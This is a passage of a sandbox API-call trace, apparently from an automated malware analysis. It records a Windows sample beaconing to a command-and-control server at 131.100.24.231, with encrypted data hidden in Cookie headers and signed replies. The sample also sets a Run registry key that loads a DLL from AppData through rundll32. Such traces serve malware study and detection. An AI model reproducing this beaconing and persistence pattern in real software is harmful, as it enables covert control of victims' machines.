JtQQnVBAkUi=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTiwyAKSKp7qrr8s98AHrQ9ZP4kEam2Row/w8nMtSKfUPnkOQpMaxrSN49fYGfOiyFwmty0V3Z7PPUzCifDnc5n5enAfRsVk2J1wtksa3rRXbw1C3RXVd5KutPBKWrkqj6TGqdsnABIHI2w==\r\n") returned 378 [0279.613] GetProcessHeap () returned 0x530000 [0279.613] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63080 | out: hHeap=0x530000) returned 1 [0279.613] GetProcessHeap () returned 0x530000 [0279.613] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2aa4e48 | out: hHeap=0x530000) returned 1 [0279.613] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0279.614] GetProcessHeap () returned 0x530000 [0279.614] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0279.614] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0279.615] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="UUjGUHzEthTahLxeYVthAdNitVdOehJweJVinGsldtKfFTIagXDeKIobzUPVWUT", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0279.616] GetProcessHeap () returned 0x530000 [0279.616] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0279.616] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0279.616] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0279.616] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0279.616] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: JtQQnVBAkUi=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTiwyAKSKp7qrr8s98AHrQ9ZP4kEam2Row/w8nMtSKfUPnkOQpMaxrSN49fYGfOiyFwmty0V3Z7PPUzCifDnc5n5enAfRsVk2J1wtksa3rRXbw1C3RXVd5KutPBKWrkqj6TGqdsnABIHI2w==\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0280.839] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0280.839] GetProcessHeap () returned 0x530000 [0280.839] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0280.840] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x152) returned 1 [0280.840] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47f52, dwNumberOfBytesToRead=0xfeae, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47f52*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0280.840] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0280.840] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0280.840] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0280.840] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0280.840] GetProcessHeap () returned 0x530000 [0280.840] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0280.840] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf51c) returned 0x0 [0280.840] GetProcessHeap () returned 0x530000 [0280.840] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0280.840] GetProcessHeap () returned 0x530000 [0280.840] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1810 [0280.840] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0280.841] GetProcessHeap () returned 0x530000 [0280.841] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0280.841] GetProcessHeap () returned 0x530000 [0280.841] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1810 | out: hHeap=0x530000) returned 1 [0280.841] GetProcessHeap () returned 0x530000 [0280.841] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63080 [0280.842] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0280.842] GetProcessHeap () returned 0x530000 [0280.842] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63080 | out: hHeap=0x530000) returned 1 [0280.842] GetProcessHeap () returned 0x530000 [0280.842] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0280.842] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48) returned 0x0 [0280.842] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x2a764d0, cbInput=0x8, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0280.842] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf510, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf510) returned 0x0 [0280.842] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0280.842] GetProcessHeap () returned 0x530000 [0280.842] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0280.842] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0280.842] BCryptVerifySignature (hKey=0x584858, pPaddingInfo=0x0, pbHash=0x2cf510, cbHash=0x20, pbSignature=0x2a7648c, cbSignature=0x40, dwFlags=0x0) returned 0x0 [0280.844] GetProcessHeap () returned 0x530000 [0280.844] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x8) returned 0x2a6c690 [0280.844] GetProcessHeap () returned 0x530000 [0280.844] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0280.844] GetProcessHeap () returned 0x530000 [0280.845] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b47e00 | out: hHeap=0x530000) returned 1 [0280.845] GetProcessHeap () returned 0x530000 [0280.845] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a89918 | out: hHeap=0x530000) returned 1 [0280.845] GetProcessHeap () returned 0x530000 [0280.846] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5d8258 | out: hHeap=0x530000) returned 1 [0280.846] GetProcessHeap () returned 0x530000 [0280.846] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0280.846] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x2cf5d4 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0280.846] GetProcessHeap () returned 0x530000 [0280.846] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x38) returned 0x2a83ae0 [0280.846] _snwprintf (in: _Dest=0x2cf1c4, _Count=0x104, _Format="%s\\rundll32.exe \"%s\\%s\",%s" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",GMmkFNztk") returned 99 [0280.846] GetProcessHeap () returned 0x530000 [0280.847] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a83ae0 | out: hHeap=0x530000) returned 1 [0280.847] GetProcessHeap () returned 0x530000 [0280.847] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0280.847] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x2cf1b0, lpdwDisposition=0x0 | out: phkResult=0x2cf1b0*=0x670, lpdwDisposition=0x0) returned 0x0 [0280.847] GetProcessHeap () returned 0x530000 [0280.848] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0280.848] lstrlenW (lpString="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",GMmkFNztk") returned 99 [0280.848] RegSetValueExW (in: hKey=0x670, lpValueName="tfnfdhfu.kqr", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",GMmkFNztk", cbData=0xc8 | out: lpData="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr\",GMmkFNztk") returned 0x0 [0280.849] RegCloseKey (hKey=0x670) returned 0x0 [0280.849] GetProcessHeap () returned 0x530000 [0280.849] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6c690 | out: hHeap=0x530000) returned 1 [0280.849] GetProcessHeap () returned 0x530000 [0280.849] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5afeb0 | out: hHeap=0x530000) returned 1 [0280.849] WaitForSingleObject (hHandle=0x1a8, dwMilliseconds=0xeb1a1) returned 0x102 [0290.852] GetProcessHeap () returned 0x530000 [0290.852] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0290.852] _snwprintf (in: _Dest=0x2cf5d0, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned 54 [0290.852] GetProcessHeap () returned 0x530000 [0290.852] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0290.852] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0290.852] GetProcessHeap () returned 0x530000 [0290.852] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0290.852] _snwprintf (in: _Dest=0x2cf040, _Count=0x104, _Format="%s\\*" | out: _Dest="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*") returned 44 [0290.852] GetProcessHeap () returned 0x530000 [0290.852] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0290.852] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Oxeedtbi\\\\*", lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName=".", cAlternateFileName="")) returned 0x2a83ae0 [0290.853] FindNextFileW (in: hFindFile=0x2a83ae0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7de3c200, ftCreationTime.dwHighDateTime=0x1d806e7, ftLastAccessTime.dwLowDateTime=0x841515c0, ftLastAccessTime.dwHighDateTime=0x1d806e7, ftLastWriteTime.dwLowDateTime=0x841515c0, ftLastWriteTime.dwHighDateTime=0x1d806e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="..", cAlternateFileName="")) returned 1 [0290.853] FindNextFileW (in: hFindFile=0x2a83ae0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 1 [0290.853] PathFindFileNameW (pszPath="Oxeedtbi\\tfnfdhfu.kqr") returned="tfnfdhfu.kqr" [0290.853] lstrcmpiW (lpString1="tfnfdhfu.kqr", lpString2="tfnfdhfu.kqr") returned 0 [0290.853] FindNextFileW (in: hFindFile=0x2a83ae0, lpFindFileData=0x2cf248 | out: lpFindFileData=0x2cf248*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a27bcb0, ftCreationTime.dwHighDateTime=0x1d80167, ftLastAccessTime.dwLowDateTime=0x6a27bcb0, ftLastAccessTime.dwHighDateTime=0x1d80167, ftLastWriteTime.dwLowDateTime=0x6a27bcb0, ftLastWriteTime.dwHighDateTime=0x1d80167, nFileSizeHigh=0x0, nFileSizeLow=0x67627, dwReserved0=0x6b002e, dwReserved1=0x720071, cFileName="tfnfdhfu.kqr", cAlternateFileName="")) returned 0 [0290.853] FindClose (in: hFindFile=0x2a83ae0 | out: hFindFile=0x2a83ae0) returned 1 [0290.854] GetProcessHeap () returned 0x530000 [0290.854] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x2f) returned 0x5afeb0 [0290.854] GetProcessHeap () returned 0x530000 [0290.854] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd7140 [0290.854] GetProcessHeap () returned 0x530000 [0290.854] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1810 [0290.854] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf4b0, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf4b0) returned 0x0 [0290.855] GetProcessHeap () returned 0x530000 [0290.855] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd7140 | out: hHeap=0x530000) returned 1 [0290.855] GetProcessHeap () returned 0x530000 [0290.855] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1810 | out: hHeap=0x530000) returned 1 [0290.855] GetProcessHeap () returned 0x530000 [0290.855] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b63080 [0290.855] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4b8, cbOutput=0x4, pcbResult=0x2cf4bc, dwFlags=0x0 | out: pbOutput=0x2cf4b8, pcbResult=0x2cf4bc) returned 0x0 [0290.855] GetProcessHeap () returned 0x530000 [0290.856] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b63080 | out: hHeap=0x530000) returned 1 [0290.856] GetProcessHeap () returned 0x530000 [0290.856] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0290.856] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x5e0090, phHash=0x2cf4ac, pbHashObject=0x2a7ac48) returned 0x0 [0290.856] BCryptHashData (in: hHash=0x2a7ac50, pbInput=0x5afeb0, cbInput=0x2f, dwFlags=0x0 | out: hHash=0x2a7ac50) returned 0x0 [0290.856] BCryptFinishHash (in: hHash=0x2a7ac50, pbOutput=0x2cf5e0, cbOutput=0x20, dwFlags=0x0 | out: hHash=0x2a7ac50, pbOutput=0x2cf5e0) returned 0x0 [0290.856] BCryptDestroyHash (in: hHash=0x2a7ac50 | out: hHash=0x2a7ac50) returned 0x0 [0290.856] GetProcessHeap () returned 0x530000 [0290.856] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a7ac48 | out: hHeap=0x530000) returned 1 [0290.856] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x5e0090, dwFlags=0x0 | out: hAlgorithm=0x5e0090) returned 0x0 [0290.856] GetProcessHeap () returned 0x530000 [0290.856] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x5b) returned 0x2a76488 [0290.856] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76488, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf4b4) returned 0x0 [0290.856] GetProcessHeap () returned 0x530000 [0290.856] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76420 [0290.856] BCryptEncrypt (in: hKey=0x5bd870, pbInput=0x2a76488, cbInput=0x5b, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76420, cbOutput=0x60, pcbResult=0x2cf4b4, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76420, pcbResult=0x2cf4b4) returned 0x0 [0290.857] GetProcessHeap () returned 0x530000 [0290.857] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xf0) returned 0x5e6360 [0290.857] GetProcessHeap () returned 0x530000 [0290.857] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76420 | out: hHeap=0x530000) returned 1 [0290.857] GetProcessHeap () returned 0x530000 [0290.857] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a76488 | out: hHeap=0x530000) returned 1 [0290.857] CryptBinaryToStringW (in: pbBinary=0x5e6360, cbBinary=0xf0, dwFlags=0x40000001, pszString=0x0, pcchString=0x2cf504 | out: pszString=0x0, pcchString=0x2cf504) returned 1 [0290.857] GetProcessHeap () returned 0x530000 [0290.857] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x282) returned 0x2b65430 [0290.857] CryptBinaryToStringW (in: pbBinary=0x5e6360, cbBinary=0xf0, dwFlags=0x40000001, pszString=0x2b65430, pcchString=0x2cf504 | out: pszString="jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgCa4cfMPvvaMFlbH2Alprtt3sMUiAFqm+3+8zMka9J/5iv3zJ2qVJTLDMiPeJNdwhSDOdO52zXdUdBTnNHiw0XsGa35CoKqeJcjLtACvd2L", pcchString=0x2cf504) returned 1 [0290.857] GetProcessHeap () returned 0x530000 [0290.857] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4000) returned 0x5d8258 [0290.857] GetProcessHeap () returned 0x530000 [0290.858] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fe0 [0290.858] _snwprintf (in: _Dest=0x5d8258, _Count=0x4000, _Format="Cookie: %s=%s\r\n" | out: _Dest="Cookie: rpNYTPjHmNXdmIg=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgCa4cfMPvvaMFlbH2Alprtt3sMUiAFqm+3+8zMka9J/5iv3zJ2qVJTLDMiPeJNdwhSDOdO52zXdUdBTnNHiw0XsGa35CoKqeJcjLtACvd2L\r\n") returned 346 [0290.858] GetProcessHeap () returned 0x530000 [0290.858] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fe0 | out: hHeap=0x530000) returned 1 [0290.858] GetProcessHeap () returned 0x530000 [0290.858] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b65430 | out: hHeap=0x530000) returned 1 [0290.858] InternetOpenW (lpszAgent=0x0, dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0290.858] GetProcessHeap () returned 0x530000 [0290.859] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0290.859] InternetConnectW (hInternet=0xcc0004, lpszServerName="131.100.24.231", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0290.860] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb=0x0, lpszObjectName="kIveWRCGbQlVsKDQuCjbRbxbpDmUTLRXQzstFZzYzrszPLCEuLPYdLC", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x84ccf300, dwContext=0x0) returned 0xcc000c [0290.860] GetProcessHeap () returned 0x530000 [0290.860] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x530000) returned 1 [0290.860] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x41, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0290.860] InternetQueryOptionW (in: hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8 | out: lpBuffer=0x2cf5b8, lpdwBufferLength=0x2cf5d8) returned 1 [0290.860] InternetSetOptionW (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0x2cf5b8*, dwBufferLength=0x4) returned 1 [0290.860] HttpSendRequestW (hRequest=0xcc000c, lpszHeaders="Cookie: rpNYTPjHmNXdmIg=jpijciwkfNog0jBnpMeLgO4ddKQRChWwS/CghvzNUdlSzanoSXKnnchMOOaq2v87GxSZfVpSwCRHu3guy3wl65/pR9BBd1IoccMjKCJr7VK4xPslYCkvoY+O8IpnQSuV34IO2MUZMXUBv54TSONlcT9FWO2CvbWl/9K+XkVttZ3ojYuz2Z/3uUexP5/9Xt6QoO9xu00EQBYC5CuVMIePTgCa4cfMPvvaMFlbH2Alprtt3sMUiAFqm+3+8zMka9J/5iv3zJ2qVJTLDMiPeJNdwhSDOdO52zXdUdBTnNHiw0XsGa35CoKqeJcjLtACvd2L\r\n", dwHeadersLength=0xffffffff, lpOptional=0x0*, dwOptionalLength=0x0) returned 1 [0292.272] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x2cf490, lpdwBufferLength=0x2cf494, lpdwIndex=0x0 | out: lpBuffer=0x2cf490*, lpdwBufferLength=0x2cf494*=0x4, lpdwIndex=0x0) returned 1 [0292.272] GetProcessHeap () returned 0x530000 [0292.272] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10000) returned 0x2b47e00 [0292.272] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b47e00, dwNumberOfBytesToRead=0x10000, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b47e00*, lpdwNumberOfBytesRead=0x2cf49c*=0x447) returned 1 [0292.272] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2b48247, dwNumberOfBytesToRead=0xfbb9, lpdwNumberOfBytesRead=0x2cf49c | out: lpBuffer=0x2b48247*, lpdwNumberOfBytesRead=0x2cf49c*=0x0) returned 1 [0292.272] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0292.272] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0292.273] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0292.273] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x0, cbOutput=0x0, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x0, pcbResult=0x2cf51c) returned 0x0 [0292.273] GetProcessHeap () returned 0x530000 [0292.273] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x60) returned 0x2a76488 [0292.273] BCryptDecrypt (in: hKey=0x5bd870, pbInput=0x2b47e00, cbInput=0x60, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x2a76488, cbOutput=0x60, pcbResult=0x2cf51c, dwFlags=0x1 | out: hKey=0x5bd870, pbIV=0x0, pbOutput=0x2a76488, pcbResult=0x2cf51c) returned 0x0 [0292.273] GetProcessHeap () returned 0x530000 [0292.273] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x10) returned 0x2bd72f0 [0292.273] GetProcessHeap () returned 0x530000 [0292.273] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x40) returned 0x2ad1810 [0292.273] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2cf498, pszAlgId="SHA256", pszImplementation="Microsoft Primitive Provider", dwFlags=0x0 | out: phAlgorithm=0x2cf498) returned 0x0 [0292.273] GetProcessHeap () returned 0x530000 [0292.273] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2bd72f0 | out: hHeap=0x530000) returned 1 [0292.273] GetProcessHeap () returned 0x530000 [0292.274] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ad1810 | out: hHeap=0x530000) returned 1 [0292.274] GetProcessHeap () returned 0x530000 [0292.274] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x20) returned 0x2b62fb8 [0292.274] BCryptGetProperty (in: hObject=0x5e0090, pszProperty="ObjectLength", pbOutput=0x2cf4a0, cbOutput=0x4, pcbResult=0x2cf4a4, dwFlags=0x0 | out: pbOutput=0x2cf4a0, pcbResult=0x2cf4a4) returned 0x0 [0292.274] GetProcessHeap () returned 0x530000 [0292.274] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2b62fb8 | out: hHeap=0x530000) returned 1 [0292.274] GetProcessHeap () returned 0x530000 [0292.274] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb2) returned 0x2a7ac48 [0292.275] BCryptCreateHash (in: hAlgorithm=0x5e0090, phHash=0x2cf494, pbHashObject=0x2a7ac48, cbHashObject=0xb2, pbSecret=0x0, 